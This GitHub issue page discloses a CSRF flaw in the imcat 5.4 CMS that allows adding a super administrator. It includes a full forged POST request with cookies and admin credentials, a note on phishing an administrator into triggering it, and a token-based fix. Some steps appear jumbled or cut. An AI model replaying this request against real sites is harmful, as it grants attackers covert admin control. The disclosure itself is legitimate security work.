-
Notifications
You must be signed in to change notification settings - Fork 7
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CSRF vulnerability in imcat v5.4 #9
Comments
Can you add an administrator account Befor login an administrator? You can logout the system, and test the |
You can understand CSRF attack as follows: the attacker embezzles your identity and sends malicious requests in your name. CSRF can do things like: send e-mail in your name, send messages, steal your account number, even buy goods, transfer money with virtual currency... Problems caused by CSRF include: personal privacy leakage and property security. |
OK, I created a Security Advisories: |
Thanks!Good luck! |
1. Overview
Official website: http://txjia.com/imcat/
Version: imcat-5.4
Vulnerability type: CSRF post
Source code: https://github.com/peacexie/imcat/releases/tag/v5.4
Harm: Super administrator account can be added
2. Analysis
2.1 logic analysis
In the add administrator page, the security of data source is not verified by token and referer
(1) There is no token used for security verification in the data packet, so there is the possibility of forgery
POST /imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=& HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 539
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=&recbk=ref
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder_Path=Files%3A%2F%3A1; v49_sessid_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49_Uniqueid_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; Hm_lpvt_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49_vcodes=fmadm%3Dnull%0Afmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3D1623830847%2C7da4f846fdbd0243%0A; v49_ocar_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9
Upgrade-Insecure-Requests: 1
recbk=http%3A%2F%2F127.0.0.1%2Fimcat%2Froot%2Frun%2Fadm.php%3Fdops-a%26mod%3Dadminer&fm%5Buid%5D=2021-6p-j6xk&fm%5Buno%5D=1&fm%5Buname%5D=qwe_123&fm%5Bupass%5D=adm_123&fm%5Bgrade%5D=supper&fm%5Bshow%5D=1&fm%5Bmname%5D=qwe_123&fm%5Bindep%5D=inadm&fm%5Bmiuid%5D=&fm%5Bmtel%5D=12345678091&fm%5Bmemail%5D=23wqw%4022.com&fm%5Bmaddr%5D=&fm%5Batime%5D=2021-06-21+17%3A14%3A49&fm%5Betime%5D=2021-06-21+17%3A14%3A49&fm%5Bauser%5D=adm_123&fm%5Beuser%5D=adm_123&fm%5Baip%5D=127.0.0.1&fm%5Beip%5D=127.0.0.1&bsend=%E6%8F%90%E4%BA%A4&mod=adminer&isadd=1
(2) After deleting the referer: information, you can still add an administrator
3. Loophole recurrence
(1) Environment preparation, building environment with phpstudy
<script>history.pushState('', '', '/')</script> (3) Through a variety of fishing means to lure the administrator to click on the page, that is, to complete the action of adding super administrator without the administrator's knowledge ![image](https://user-images.githubusercontent.com/58809869/123199520-9c4db300-d4e1-11eb-8c46-94d9a911babe.png) ![image](https://user-images.githubusercontent.com/58809869/123199525-9f48a380-d4e1-11eb-8d18-87c3044191a5.png) ![image](https://user-images.githubusercontent.com/58809869/123199531-a2dc2a80-d4e1-11eb-9df6-fb13551bbcfe.png) ### 4. Verification of attack results(2) Construct a payload with the function of creating a super administrator account, qwe_ 123/adm_ one hundred and twenty-three
Using qwe_ 123/adm_ 123 login in the background
5. Means of Defense
Add a token to the place where important actions are performed for authentication. The value of the token must be random and unpredictable
The text was updated successfully, but these errors were encountered: